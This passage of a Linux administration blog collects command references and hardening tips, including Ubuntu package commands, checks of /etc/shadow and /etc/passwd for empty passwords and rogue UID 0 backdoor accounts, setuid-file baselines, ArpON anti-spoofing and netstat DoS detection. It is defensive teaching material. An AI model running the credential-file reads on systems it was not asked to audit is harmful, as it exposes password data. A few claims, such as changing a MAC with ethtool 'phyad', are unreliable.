UBUNTU COMMAND

Posted: January 13, 2012 in LINUX, Ubuntu Command ref

## How to view installed packages on Ubuntu

List every installed package with its version and status:

# dpkg --list

Show the details of one installed package (dpkg --info/-I takes a .deb archive file, not an installed package name; -s queries the installed database):

# dpkg -s packageName

Remove a package:

# apt-get remove packageName

 

4: Keep the Linux kernel and software up to date

# apt-get update && apt-get upgrade

apt-get upgrade never installs new packages, and on Ubuntu a new kernel arrives as a new package, so when the kernel or dependencies need to change run apt-get dist-upgrade instead and reboot afterwards; until the reboot the old kernel is still the one running.

 

#6.3: Locking user accounts after login failures

To see failed login attempts, enter:

faillog

To reset the failure counter and unlock an account after login failures, run:

faillog -r -u userName

Note that you can use the passwd command to lock and unlock accounts:

# lock account
passwd -l userName

# unlock account
passwd -u userName

#6.4: How do I verify no accounts have empty passwords?

Type the following command. An empty second field in /etc/shadow means the account can log in with no password at all; "!" or "*" in that field means the account is locked, which is fine:

# awk -F: '($2 == "") {print}' /etc/shadow

Lock every empty-password account it reports:

# passwd -l accountName

 

#6.5: Make sure no non-root accounts have UID 0

Only the root account should have UID 0, which carries full access to the system. Type the following command to display all accounts with UID 0; any line other than root is a finding (a second UID 0 account is a classic backdoor):

# awk -F: '($3 == 0) {print}' /etc/passwd
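The two checks in 6.4 and 6.5 as reusable functions, with the audit run against constructed passwd and shadow files so it can be tried without touching /etc. This is an added example, not part of the original post; the sample accounts ("toor", "alice") and hashes are made up.

```shell
#!/bin/sh
# Added example (not from the original post): audit passwd/shadow-style files
# for accounts with an empty password field and for accounts with UID 0.
# The functions take file paths so they run against copies or sample data;
# on a live host pass /etc/shadow and /etc/passwd (needs root for shadow).

# Login names whose password field (field 2) is empty: no password required.
empty_password_accounts() {
    awk -F: '$2 == "" { print $1 }' "$1"
}

# Every login with UID 0 (numeric compare also catches "00" or "000").
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# The real finding: UID 0 accounts that are not root.
non_root_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# --- constructed sample data (not a real system) ---
SAMPLE_DIR=$(mktemp -d)
cat > "$SAMPLE_DIR/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
toor:x:0:0:second root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
EOF
cat > "$SAMPLE_DIR/shadow" <<'EOF'
root:$6$saltsalt$hashhashhash:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
toor::19000:0:99999:7:::
alice:!:19000:0:99999:7:::
EOF

echo "Empty-password accounts:"; empty_password_accounts "$SAMPLE_DIR/shadow"
echo "Non-root UID 0 accounts:"; non_root_uid0_accounts "$SAMPLE_DIR/passwd"
```

Both findings point at the same planted account ("toor"): it has no password and UID 0, which is exactly the combination the two one-liners above are meant to catch.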

 

Q. How do I secure the GRUB boot loader?

Note: this applies to GRUB Legacy (0.9x), which reads /boot/grub/menu.lst. Ubuntu releases since 9.10 ship GRUB 2, where menu.lst and grub-md5-crypt do not exist; there the hash comes from grub-mkpasswd-pbkdf2 and the superusers and password_pbkdf2 lines go in /etc/grub.d/40_custom, followed by update-grub.

#1: Create a password for GRUB

Type the grub-md5-crypt command to create an MD5-crypt password hash:

# grub-md5-crypt

Output:

Password:<ENTER-YOUR-PASSWORD>
Retype password:<ENTER-YOUR-PASSWORD>
$1$NYoR71$Sgv6pxQ6LG4GXpfihIJyL0

Copy the hash ($1$NYoR71$Sgv6pxQ6LG4GXpfihIJyL0) into the configuration file.

#2: Add the MD5 password to the GRUB configuration file

Under Debian GNU/Linux the GRUB Legacy configuration file is /boot/grub/menu.lst (Red Hat / Fedora use /boot/grub/grub.conf):

# vi /boot/grub/menu.lst

Edit the file and add a password line as follows:

password --md5 $1$NYoR71$Sgv6pxQ6LG4GXpfihIJyL0

To also require the password for the recovery (single-user) entries, set lockalternative to true in /boot/grub/menu.lst. The line lives in the commented block that update-grub reads, so it keeps its leading "#":

# lockalternative=true

A GRUB password stops menu editing only. Anyone with physical access can still boot other media or change the firmware settings, so pair it with a BIOS/UEFI password and a locked boot order.

 

 

To disable the reboot triggered by the Ctrl+Alt+Delete key combination on an Upstart system of that era, comment out the exec line in /etc/event.d/control-alt-delete (later Upstart releases moved it to /etc/init/control-alt-delete.conf; on systemd the equivalent is masking ctrl-alt-del.target):

#exec /sbin/shutdown -r now "Control-Alt-Delete pressed"

 

 

#9.1: Find listening network ports

List all listening TCP and UDP ports with the programs bound to them (run as root, otherwise -p cannot name other users' processes; netstat is deprecated in favour of ss from iproute2, which accepts the same -tulpn flags):

netstat -tulpn

OR scan the host from outside and compare with what you expect to be exposed (-O needs root):

nmap -sT -O localhost

nmap -sT -O server.example.com

 

#15: Disable unwanted SUID and SGID binaries

# See all set-user-ID files (the old "-perm +4000" spelling was removed from GNU find; -4000 means "that bit is set"):

find / -perm -4000

# See all set-group-ID files:

find / -perm -2000

# Or combine both in a single command:

find / \( -perm -4000 -o -perm -2000 \) -print

# The same, limited to regular files on the root filesystem (-xdev skips /proc and other mounts) with a long listing; -perm /6000 matches either bit:

find / -xdev -type f -perm /6000 -ls
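Listing set-UID files once is only half the job; what you want to know later is whether a new one appeared. The following is an added example, not from the original post: it snapshots the set-UID/set-GID files under a tree and reports additions against a saved baseline, run here on a constructed directory (the file names and modes are made up) so it needs no root.

```shell
#!/bin/sh
# Added example (not from the original post): snapshot the set-UID/set-GID
# files under a directory tree and report additions against a saved baseline.
# A new SUID binary outside a package upgrade is a classic persistence and
# privilege-escalation artefact, so the diff is what you alert on.
# Uses -perm /6000 (either bit set) instead of the removed "+6000" syntax and
# -xdev so the walk stays on one filesystem. -printf is GNU find.

# Print "mode owner path" for every set-UID/set-GID regular file under $1, sorted.
list_setid() {
    find "$1" -xdev -type f -perm /6000 -printf '%m %u %p\n' 2>/dev/null | sort
}

# Compare a fresh listing against baseline file $2; print lines not in the baseline.
new_setid_since() {
    list_setid "$1" > "$2.now"
    comm -13 "$2" "$2.now"
}

# --- constructed demo tree (not a real system) ---
DEMO=$(mktemp -d)
mkdir -p "$DEMO/bin" "$DEMO/tmp"
printf '#!/bin/sh\n' > "$DEMO/bin/passwd"; chmod 4755 "$DEMO/bin/passwd"
printf '#!/bin/sh\n' > "$DEMO/bin/wall";   chmod 2755 "$DEMO/bin/wall"
printf '#!/bin/sh\n' > "$DEMO/bin/ls";     chmod 0755 "$DEMO/bin/ls"

# Take the baseline while the tree is known-good (on a real host: right after install).
list_setid "$DEMO" > "$DEMO/setid.baseline"

# Later, something drops a set-UID shell copy in a hidden file under tmp...
printf '#!/bin/sh\n' > "$DEMO/tmp/.x"; chmod 4755 "$DEMO/tmp/.x"

echo "New set-UID/set-GID files since baseline:"
new_setid_since "$DEMO" "$DEMO/setid.baseline"
```

Keep the baseline file somewhere the system under audit cannot write (or sign it); a baseline an attacker can edit is no baseline.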

 

#15.1: World-writable files and directories

Anyone can modify a world-writable file, which is a security issue. The command below finds world-writable directories that lack the sticky bit (on a sticky directory such as /tmp only a file's owner can delete or rename it, which is why /tmp itself is not reported); to list world-writable regular files instead, replace -type d with -type f and drop the sticky-bit test:

find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

 

#15.2: Files with no owner

Files not owned by any existing user or group usually mean a deleted account or a stray package and can pose a security problem. Find those that belong to neither a valid user nor a valid group:

find /dir -xdev \( -nouser -o -nogroup \) -print

 

ArpON - Protect yourself from MITM attacks

ArpON (ARP handler inspection) is a portable handler daemon that secures ARP in order to prevent Man-in-the-Middle attacks through ARP spoofing/poisoning. It also detects and blocks the attacks that ARP poisoning is used to set up: DHCP spoofing, DNS spoofing, web spoofing, session hijacking, SSL/TLS hijacking and the like.

This is possible using two kinds of anti-ARP-poisoning techniques: the first is based on SARPI, "Static ARP Inspection", the second on DARPI, "Dynamic ARP Inspection". SARPI and DARPI protect against unidirectional, bidirectional and distributed attacks.

Here is a very quick example of its usage; we will use SARPI.

arpon -n 10 -g -u 1 -s -i eth0

ArpON "Arp handler inspection" version 1.90 (http://arpon.sourceforge.net)

[00/02/2011 - 08:32:04 PST] Device: (eth0) MAC: 0:24:21:66:9:5a Inet4: 192.168.1.101 Netmask: 255.255.255.0
[00/02/2011 - 08:32:04 PST] SARPI Start...
[00/02/2011 - 08:32:04 PST] SARPI protects these Arp Cache's entries:
[00/02/2011 - 08:32:04 PST] 1)     192.168.1.1 ->  0:66:78:d6:92:c8
[00/02/2011 - 08:32:04 PST] SARPI Arp Cache refresh timeout: 1 minute.
[00/02/2011 - 08:32:04 PST] SARPI Realtime Protect actived!

-n 10 ~ Sets priority
-g ~ Works in logging mode
-u 1 ~ Sets SARPI timeout to 1 minute
-s ~ Manage ARP cache statically
-i eth0 ~ Interface to protect

SARPI protects whatever static entries the ARP cache holds when the daemon starts, so check that the gateway's MAC it prints (here 0:66:78:d6:92:c8) is the real one before trusting it: a daemon that locks in an already-poisoned entry protects the attacker.

You can get ArpON with apt-get or from http://arpon.sourceforge.net

 

 

Multiple network interfaces and ARP flux

$ sysctl -a | grep 'net.ipv4.conf.*.arp'

A simple fix that may work

If all three network interfaces are on different IP networks (such as 10.x.x.x, 172.16.x.x, 192.168.x.x) then the following will work:

sysctl -w net.ipv4.conf.all.arp_filter=1

However, if they are all on the same IP network, which is the case here, this will not achieve the desired result.

A more effective solution

Test the following with sysctl -w first; once it behaves, add the same keys to /etc/sysctl.conf as "net.ipv4.conf.all.arp_ignore = 1" and "net.ipv4.conf.all.arp_announce = 2" (without the sysctl -w) so they survive a reboot:

sysctl -w net.ipv4.conf.all.arp_ignore=1
sysctl -w net.ipv4.conf.all.arp_announce=2
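Setting the "all" key is not the whole story: for arp_ignore and arp_announce the kernel applies the larger of conf/all/KEY and conf/IFACE/KEY, and arp_filter is on if either is set, so a per-interface value can silently override what you set above, or the other way round. The script below is an added example, not part of the original post; it reports the effective value per interface and takes the conf directory as a parameter so the demo can run on a constructed copy of /proc/sys/net/ipv4/conf (interface names and values below are made up).

```shell
#!/bin/sh
# Added example (not from the original post): report the ARP sysctls that
# actually apply per interface. arp_ignore/arp_announce use the larger of
# conf/all/KEY and conf/IFACE/KEY; arp_filter is on if either is set, so the
# max covers all three keys. BASE is /proc/sys/net/ipv4/conf on a live host.

# effective_arp BASE IFACE KEY -> prints the effective value
effective_arp() {
    all=$(cat "$1/all/$3")
    dev=$(cat "$1/$2/$3")
    if [ "$all" -gt "$dev" ]; then echo "$all"; else echo "$dev"; fi
}

# arp_flux_ok BASE IFACE -> exit 0 when the anti-flux settings recommended
# above are in force for IFACE (arp_ignore >= 1 and arp_announce == 2)
arp_flux_ok() {
    [ "$(effective_arp "$1" "$2" arp_ignore)" -ge 1 ] &&
    [ "$(effective_arp "$1" "$2" arp_announce)" -eq 2 ]
}

# report BASE -> one status line per real interface (skips all/ and default/)
report() {
    for d in "$1"/*/; do
        i=$(basename "$d")
        case $i in all|default) continue ;; esac
        printf '%-6s arp_filter=%s arp_ignore=%s arp_announce=%s flux_ok=%s\n' "$i" \
            "$(effective_arp "$1" "$i" arp_filter)" \
            "$(effective_arp "$1" "$i" arp_ignore)" \
            "$(effective_arp "$1" "$i" arp_announce)" \
            "$(arp_flux_ok "$1" "$i" && echo yes || echo no)"
    done
}

# --- constructed sysctl tree: "all" tightened, eth1 overriding one key ---
BASE=$(mktemp -d)
for i in all default eth0 eth1; do
    mkdir -p "$BASE/$i"
    echo 0 > "$BASE/$i/arp_filter"
    echo 0 > "$BASE/$i/arp_ignore"
    echo 0 > "$BASE/$i/arp_announce"
done
echo 1 > "$BASE/all/arp_ignore"
echo 2 > "$BASE/all/arp_announce"
echo 1 > "$BASE/eth1/arp_filter"

report "$BASE"
# Live host: report /proc/sys/net/ipv4/conf
```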

 

 

1/ Clearing ARP cache and table.

You need "arp -d hostname" repeatedly to accomplish this.

You could make a script. Is there an easier way?

2/ Clearing the routing table

"route del ROUTEDESCRIPTOR" repeatedly.

3/ Changing the MAC of my eth0 card and also changing it back to the original

See "man ethtool", the -e -E options change the firmware setting. The
"ethtool ethN -s phyad 01:22:33:44:55" will temporarily change (till reboot or re-command).

4/ Restarting the network and taking it down.

For a fixed config the RedHat "ifup ethN" and "ifdown ethN" will do. But also see the
"ip" command and the older deprecated (but very common) "ifconfig" command.

5/ Assigning static IPs and masks and then restarting the network to make sure it worked

I'd use "ip", but "ifconfig" is good too.

ip addr add 192.168.0.77/24 dev eth0
ip link set eth0 up
ip link set eth0 down

or

ifconfig eth0 192.168.0.9/24 up
ifconfig eth0 down

6/ Firewall stuff

"man iptables" stuff. Search google.com/linux for "iptables howto".

7/ ACLs

/usr/bin/chacl
/usr/bin/getfacl
/usr/bin/setfacl

See "man acl" and "man COMMAND" for the above. Totally POSIX AFAIK.

If you don't have these then "su -; yum -y install acl", but I think they are in the default distro.

"ip neighbor flush all" - clears the arp table(s).

2/ "ip route flush all" - clears the entire route table.

The lesson is that the "ip" command subsumes nearly all of the arp/route/ifconfig commands and should be used instead.

The following output is from executing this command on the HN.

$ sysctl -a | grep 'net.ipv4.conf.*.arp'

$ cat /proc/net/arp

$ ip route ls

This is a Linux command line reference for common operations.
All these commands have been tested on both Fedora and Ubuntu.

Command                                                   Description

apropos whatis                                            Show commands pertinent to string
man -t ascii | ps2pdf - > ascii.pdf                       Make a pdf of a manual page
which command                                             Show full path name of command
time command                                              See how long a command takes
time cat                                                  Start stopwatch. Ctrl-d to stop

dir navigation
cd -                                                      Go to previous directory
cd                                                        Go to $HOME directory
(cd dir && command)                                       Go to dir, execute command and return to current dir
pushd .                                                   Put current dir on stack so you can popd back to it

file searching
alias l='ls -l --color=auto'                              Quick dir listing
ls -lrt                                                   List files by date
ls /usr/bin | pr -T9 -W$COLUMNS                           Print in 9 columns to width of terminal
find -name '*.[ch]' | xargs grep -E 'expr'                Search 'expr' in this dir and below
find -type f -print0 | xargs -r0 grep -F 'example'        Search all regular files for 'example' in this dir and below
find -maxdepth 1 -type f | xargs grep -F 'example'        Search all regular files for 'example' in this dir
find -maxdepth 1 -type d | while read dir; do echo $dir; echo cmd2; done
                                                          Process each item with multiple commands (in while loop)
find -type f ! -perm -444                                 Find files not readable by all (useful for web site)
find -type d ! -perm -111                                 Find dirs not accessible by all (useful for web site)
locate -r 'file[^/]*\.txt'                                Search cached index for names. This re is like glob *file*.txt
look reference                                            Quickly search (sorted) dictionary for prefix
grep --color reference /usr/share/dict/words              Highlight occurrences of regular expression in dictionary

archives and compression
gpg -c file                                               Encrypt file (symmetric, passphrase-based)
gpg file.gpg                                              Decrypt file
tar -c dir/ | bzip2 > dir.tar.bz2                         Make compressed archive of dir/
bzip2 -dc dir.tar.bz2 | tar -x                            Extract archive (use gzip instead of bzip2 for tar.gz files)
tar -c dir/ | gzip | gpg -c | ssh user@remote 'dd of=dir.tar.gz.gpg'
                                                          Make encrypted archive of dir/ on remote machine
find dir/ -name '*.txt' | tar -c --files-from=- | bzip2 > dir_txt.tar.bz2
                                                          Make archive of subset of dir/ and below
find dir/ -name '*.txt' | xargs cp -a --target-directory=dir_txt/ --parents
                                                          Make copy of subset of dir/ and below
( tar -c /dir/to/copy ) | ( cd /where/to/ && tar -x -p )  Copy (with permissions) copy/ dir to /where/to/ dir
( cd /dir/to/copy && tar -c . ) | ( cd /where/to/ && tar -x -p )
                                                          Copy (with permissions) contents of copy/ dir to /where/to/
( tar -c /dir/to/copy ) | ssh -C user@remote 'cd /where/to/ && tar -x -p'
                                                          Copy (with permissions) copy/ dir to remote:/where/to/ dir
dd bs=1M if=/dev/sda | gzip | ssh user@remote 'dd of=sda.gz'
                                                          Backup harddisk to remote machine

rsync (Network efficient file copier: use the --dry-run option for testing)
rsync -P rsync://rsync.server.com/path/to/file file       Only get diffs. Do multiple times for troublesome downloads
rsync --bwlimit=1000 fromfile tofile                      Locally copy with rate limit. It's like nice for I/O
rsync -az -e ssh --delete ~/public_html/ remote.com:'~/public_html'
                                                          Mirror web site (using compression and encryption)
rsync -auz -e ssh remote:/dir/ . && rsync -auz -e ssh . remote:/dir/
                                                          Synchronize current directory with remote one

ssh (Secure SHell)
ssh $USER@$HOST command                                   Run command on $HOST as $USER (default command=shell)
ssh -f -Y $USER@$HOSTNAME xeyes                           Run GUI command on $HOSTNAME as $USER
scp -p -r file dir/ $USER@$HOST:                          Copy with permissions to $USER's home directory on $HOST (destination is always the last argument)
scp -c arcfour $USER@$LANHOST: bigfile                    Use faster crypto for local LAN (arcfour is RC4: weak, and removed from current OpenSSH; use -c aes128-gcm@openssh.com instead)
ssh -g -L 8080:localhost:80 root@$HOST                    Forward connections to $HOSTNAME:8080 out to $HOST:80 (-g also lets other hosts use the forward; omit it unless you mean that)
ssh -R 1434:imap:143 root@$HOST                           Forward connections from $HOST:1434 in to imap:143
ssh-copy-id $USER@$HOST                                   Install public key for $USER@$HOST for password-less log in

wget (multi purpose download tool)
(cd dir/ && wget -nd -pHEKk http://www.pixelbeat.org/cmdline.html)
                                                          Store local browsable version of a page to the current dir
wget -c http://www.example.com/large.file                 Continue downloading a partially downloaded file
wget -r -nd -np -l1 -A '*.jpg' http://www.example.com/dir/
                                                          Download a set of files to the current directory
wget ftp://remote/file[1-9].iso/                          FTP supports globbing directly
wget -q -O- http://www.pixelbeat.org/timeline.html | grep 'a href' | head
                                                          Process output directly
echo 'wget url' | at 01:00                                Download url at 1AM to current dir
wget --limit-rate=20k url                                 Do a low priority download (limit to 20KB/s in this case)
wget -nv --spider --force-html -i bookmarks.html          Check links in a file
wget --mirror http://www.example.com/                     Efficiently update a local copy of a site (handy from cron)

networking (Note ifconfig, route, mii-tool, nslookup commands are obsolete)
ethtool eth0                                              Show status of ethernet interface eth0
ethtool --change eth0 autoneg off speed 100 duplex full   Manually set ethernet interface speed
iwconfig eth1                                             Show status of wireless interface eth1
iwconfig eth1 rate 1Mb/s fixed                            Manually set wireless interface speed
iwlist scan                                               List wireless networks in range
ip link show                                              List network interfaces
ip link set dev eth0 name wan                             Rename interface eth0 to wan
ip link set dev eth0 up                                   Bring interface eth0 up (or down)
ip addr show                                              List addresses for interfaces
ip addr add 1.2.3.4/24 brd + dev eth0                     Add (or del) ip and mask (255.255.255.0)
ip route show                                             List routing table
ip route add default via 1.2.3.254                        Set default gateway to 1.2.3.254
host pixelbeat.org                                        Lookup DNS ip address for name or vice versa
hostname -i                                               Lookup local ip address (equivalent to host `hostname`)
whois pixelbeat.org                                       Lookup whois info for hostname or ip address
netstat -tupl                                             List internet services on a system
netstat -tup                                              List active connections to/from system

windows networking (Note samba is the package that provides all this windows specific networking support)
smbtree                                                   Find windows machines
nmblookup -A 1.2.3.4                                      Find the windows (netbios) name associated with ip address
smbclient -L windows_box                                  List shares on windows machine or samba server
mount -t smbfs -o fmask=666,guest //windows_box/share /mnt/share
                                                          Mount a windows share (smbfs is gone from current kernels; use -t cifs)
echo 'message' | smbclient -M windows_box                 Send popup to windows machine (off by default in XP sp2)

text manipulation (Note sed uses stdin and stdout. Newer versions support inplace editing with the -i option)
sed 's/string1/string2/g'                                 Replace string1 with string2
sed 's/\(.*\)1/\12/g'                                     Modify anystring1 to anystring2
sed '/ *#/d; /^ *$/d'                                     Remove comments and blank lines
sed ':a; /\\$/N; s/\\\n//; ta'                            Concatenate lines with trailing \
sed 's/[ \t]*$//'                                         Remove trailing spaces from lines
sed 's/\([`"$\]\)/\\\1/g'                                 Escape shell metacharacters active within double quotes
seq 10 | sed "s/^/      /; s/ *\(.\{7,\}\)/\1/"           Right align numbers
sed -n '1000{p;q}'                                        Print 1000th line
sed -n '10,20p;20q'                                       Print lines 10 to 20
sed -n 's/.*<title>\(.*\)<\/title>.*/\1/ip;T;q'           Extract title from HTML web page
sed -i 42d ~/.ssh/known_hosts                             Delete a particular line
sort -t. -k1,1n -k2,2n -k3,3n -k4,4n                      Sort IPV4 ip addresses
echo 'Test' | tr '[:lower:]' '[:upper:]'                  Case conversion
tr -dc '[:print:]' < /dev/urandom                         Filter non printable characters
tr -s '[:blank:]' '\t' </proc/diskstats | cut -f4         cut fields separated by blanks
history | wc -l                                           Count lines

set operations (Note you can export LANG=C for speed. Also these assume no duplicate lines within a file)
sort file1 file2 | uniq                                   Union of unsorted files
sort file1 file2 | uniq -d                                Intersection of unsorted files
sort file1 file1 file2 | uniq -u                          Difference of unsorted files
sort file1 file2 | uniq -u                                Symmetric Difference of unsorted files
join -t '' -a1 -a2 file1 file2                            Union of sorted files (empty -t makes the whole line the key)
join -t '' file1 file2                                    Intersection of sorted files
join -t '' -v2 file1 file2                                Difference of sorted files
join -t '' -v1 -v2 file1 file2                            Symmetric Difference of sorted files

math
echo '(1 + sqrt(5))/2' | bc -l                            Quick math (Calculate φ)
seq -f '4/%g' 1 2 99999 | paste -sd-+ | bc -l             Calculate π the unix way
echo 'pad=20; min=64; (100*10^6)/((pad+min)*8)' | bc      More complex (int) e.g. This shows max FastE packet rate
echo 'pad=20; min=64; print (100E6)/((pad+min)*8)' | python
                                                          Python handles scientific notation
echo 'pad=20; plot [64:1518] (100*10**6)/((pad+x)*8)' | gnuplot -persist
                                                          Plot FastE packet rate vs packet size
echo 'obase=16; ibase=10; 64206' | bc                     Base conversion (decimal to hexadecimal)
echo $((0x2dec))                                          Base conversion (hex to dec) ((shell arithmetic expansion))
units -t '100m/9.58s' 'miles/hour'                        Unit conversion (metric to imperial)
units -t '500GB' 'GiB'                                    Unit conversion (SI to IEC prefixes)
units -t '1 googol'                                       Definition lookup
seq 100 | (tr '\n' +; echo 0) | bc                        Add a column of numbers

calendar
cal -3                                                    Display a calendar
cal 9 1752                                                Display a calendar for a particular month year
date -d fri                                               What date is it this friday
[ $(date -d '12:00 +1 day' +%d) = '01' ] || exit          Exit a script unless it's the last day of the month
date --date='25 Dec' +%A                                  What day does xmas fall on, this year
date --date='@2147483647'                                 Convert seconds since the epoch (1970-01-01 UTC) to date
TZ='America/Los_Angeles' date                             What time is it on west coast of US (use tzselect to find TZ)
date --date='TZ="America/Los_Angeles" 09:00 next Fri'     What's the local time for 9AM next Friday on west coast US

locales
printf "%'d\n" 1234                                       Print number with thousands grouping appropriate to locale
BLOCK_SIZE=\'1 ls -l                                      Use locale thousands grouping in ls
echo "I live in `locale territory`"                       Extract info from locale database
LANG=en_IE.utf8 locale int_prefix                         Lookup locale info for specific country
locale -kc $(locale | sed -n 's/\(LC_.\{4,\}\)=.*/\1/p') | less
                                                          List fields available in locale database

recode (Obsoletes iconv, dos2unix, unix2dos)
recode -l | less                                          Show available conversions (aliases on each line)
recode windows-1252.. file_to_change.txt                  Windows "ansi" to local charset (auto does CRLF conversion)
recode utf-8/CRLF.. file_to_change.txt                    Windows utf8 to local charset
recode iso-8859-15..utf8 file_to_change.txt               Latin9 (western europe) to utf8
recode ../b64 < file.txt > file.b64                       Base64 encode
recode /qp.. < file.qp > file.txt                         Quoted printable decode
recode ..HTML < file.txt > file.html                      Text to HTML
recode -lf windows-1252 | grep euro                       Lookup table of characters
echo -n 0x80 | recode latin-9/x1..dump                    Show what a code represents in latin-9 charmap
echo -n 0x20AC | recode ucs-2/x2..latin-9/x               Show latin-9 encoding
echo -n 0x20AC | recode ucs-2/x2..utf-8/x                 Show utf-8 encoding

CDs
gzip < /dev/cdrom > cdrom.iso.gz                          Save copy of data cdrom
mkisofs -V LABEL -r dir | gzip > cdrom.iso.gz             Create cdrom image from contents of dir
mount -o loop cdrom.iso /mnt/dir                          Mount the cdrom image at /mnt/dir (read only)
cdrecord -v dev=/dev/cdrom blank=fast                     Clear a CDRW
gzip -dc cdrom.iso.gz | cdrecord -v dev=/dev/cdrom -      Burn cdrom image (use dev=ATAPI -scanbus to confirm dev)
cdparanoia -B                                             Rip audio tracks from CD to wav files in current dir
cdrecord -v dev=/dev/cdrom -audio -pad *.wav              Make audio CD from all wavs in current dir (see also cdrdao)
oggenc --tracknum='track' track.cdda.wav -o 'track.ogg'   Make ogg file from wav file

disk space (See also FSlint)
ls -lSr                                                   Show files by size, biggest last
du -s * | sort -k1,1rn | head                             Show top disk users in current dir
du -hs /home/* | sort -k1,1h                              Sort paths by easy to interpret disk usage
df -h                                                     Show free space on mounted filesystems
df -i                                                     Show free inodes on mounted filesystems
fdisk -l                                                  Show disks partitions sizes and types (run as root)
rpm -q -a --qf '%10{SIZE}\t%{NAME}\n' | sort -k1,1n       List all packages by installed size (Bytes) on rpm distros
dpkg-query -W -f='${Installed-Size;10}\t${Package}\n' | sort -k1,1n
                                                          List all packages by installed size (KBytes) on deb distros
dd bs=1 seek=2TB if=/dev/null of=ext3.test                Create a large test file (taking no space). See also truncate
> file                                                    Truncate data of file or create an empty file

monitoring/debugging
tail -f /var/log/messages                                 Monitor messages in a log file
strace -c ls >/dev/null                                   Summarise/profile system calls made by command
strace -f -e open ls >/dev/null                           List system calls made by command
strace -f -e trace=write -e write=1,2 ls >/dev/null       Monitor what's written to stdout and stderr
ltrace -f -e getenv ls >/dev/null                         List library calls made by command
lsof -p $$                                                List paths that process id has open
lsof ~                                                    List processes that have specified path open
tcpdump not port 22                                       Show network traffic except ssh
ps -e -o pid,args --forest                                List processes in a hierarchy
ps -e -o pcpu,cpu,nice,state,cputime,args --sort pcpu | sed '/^ 0.0 /d'
                                                          List processes by % cpu usage
ps -e -orss=,args= | sort -b -k1,1n | pr -TW$COLUMNS      List processes by mem (KB) usage
ps -C firefox-bin -L -o pid,tid,pcpu,state                List all threads for a particular process
ps -p 1,$$ -o etime=                                      List elapsed wall time for particular process IDs
last reboot                                               Show system reboot history
free -m                                                   Show amount of (remaining) RAM (-m displays in MB)
watch -n.1 'cat /proc/interrupts'                         Watch changeable data continuously
udevadm monitor                                           Monitor udev events to help configure rules

system information ('#' means root access is required)
uname -a                                                  Show kernel version and system architecture
head -n1 /etc/issue                                       Show name and version of distribution
cat /proc/partitions                                      Show all partitions registered on the system
grep MemTotal /proc/meminfo                               Show RAM total seen by the system
grep "model name" /proc/cpuinfo                           Show CPU(s) info
lspci -tv                                                 Show PCI info
lsusb -tv                                                 Show USB info
mount | column -t                                         List mounted filesystems on the system (and align output)
grep -F capacity: /proc/acpi/battery/BAT0/info            Show state of cells in laptop battery
# dmidecode -q | less                                     Display SMBIOS/DMI information
# smartctl -A /dev/sda | grep Power_On_Hours              How long has this disk (system) been powered on in total
# hdparm -i /dev/sda                                      Show info about disk sda
# hdparm -tT /dev/sda                                     Do a read speed test on disk sda
# badblocks -s /dev/sda                                   Test for unreadable blocks on disk sda

interactive
readline                                                  Line editor used by bash, python, bc, gnuplot, ...
screen                                                    Virtual terminals with detach capability, ...
mc                                                        Powerful file manager that can browse rpm, tar, ftp, ssh, ...
gnuplot                                                   Interactive/scriptable graphing
links                                                     Web browser
xdg-open .                                                Open a file or url with the registered desktop application

© Jan 7 2008

Some useful commands and bash scripts

Posted: January 13, 2012 in LINUX

"FOR AEONS HAVE I ROAMED THE INTERNET"

These scripts and everything else here are collected from the internet. None of it is my own creation. All thanks go to the gurus who made it available to us.

This is useful to find out whether your server is under attack. You can also list abusive IP addresses using this method.

1) ### Daily commands for admins

Count connections by TCP state (a pile of SYN_RECV is the usual SYN-flood signature):
# netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n

Dig out more information about a specific IP address:
# netstat -nat | grep {IP-address} | awk '{print $6}' | sort | uniq -c | sort -n

A busy server gives more information:
# netstat -nat | grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n

Get a list of all unique IP addresses

To print a list of all unique IP addresses connected to the server, enter (sort before uniq: uniq only merges adjacent duplicates, and "cut -d:" assumes IPv4, since IPv6 addresses contain colons):
# netstat -nat | awk '{ print $5}' | cut -d: -f1 | sed -e '/^$/d' | sort -u
To print the total number of unique IP addresses, enter:
# netstat -nat | awk '{ print $5}' | cut -d: -f1 | sed -e '/^$/d' | sort -u | wc -l

Find out whether the box is under DoS attack

If you think your Linux box is under attack, print a list of open connections grouped by remote IP address and sorted by count:
# netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' | sort | uniq -c | sort -n
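The same per-state and per-IP counting as the one-liners above, wrapped as functions that read a saved "netstat -nat" listing from a file so the logic can be tested on a capture and thresholds applied. This is an added example, not part of the original post; the listing and the addresses in it are constructed, and the threshold of 2 is illustrative.

```shell
#!/bin/sh
# Added example (not from the original post): per-state and per-remote-IP
# connection counts over a "netstat -nat"-style listing read from a file,
# plus a threshold check for one state (e.g. SYN_RECV). Sample listing and
# addresses are constructed.

# Count connections per TCP state (column 6). Skips netstat's two header lines,
# which the bare one-liners count as states named "State" and "established)".
state_counts() {
    awk 'NR > 2 && $1 ~ /^tcp/ { n[$6]++ } END { for (s in n) print n[s], s }' "$1" | sort -rn
}

# Count connections per remote IP (column 5 with the port stripped), busiest
# first. LISTEN sockets have no peer and are skipped. sort precedes uniq
# because uniq -c only merges adjacent lines.
remote_ip_counts() {
    awk 'NR > 2 && $1 ~ /^tcp/ && $6 != "LISTEN" { sub(/:[0-9]+$/, "", $5); print $5 }' "$1" \
        | sort | uniq -c | sort -rn
}

# flag_abusers FILE LIMIT STATE -> "ip count" for remote IPs with more than
# LIMIT connections in STATE; prints nothing when no IP exceeds the limit.
flag_abusers() {
    awk -v lim="$2" -v st="$3" '
        NR > 2 && $1 ~ /^tcp/ && $6 == st { sub(/:[0-9]+$/, "", $5); n[$5]++ }
        END { for (ip in n) if (n[ip] > lim) print ip, n[ip] }' "$1" | sort
}

# --- constructed sample listing ---
CAP=$(mktemp)
cat > "$CAP" <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
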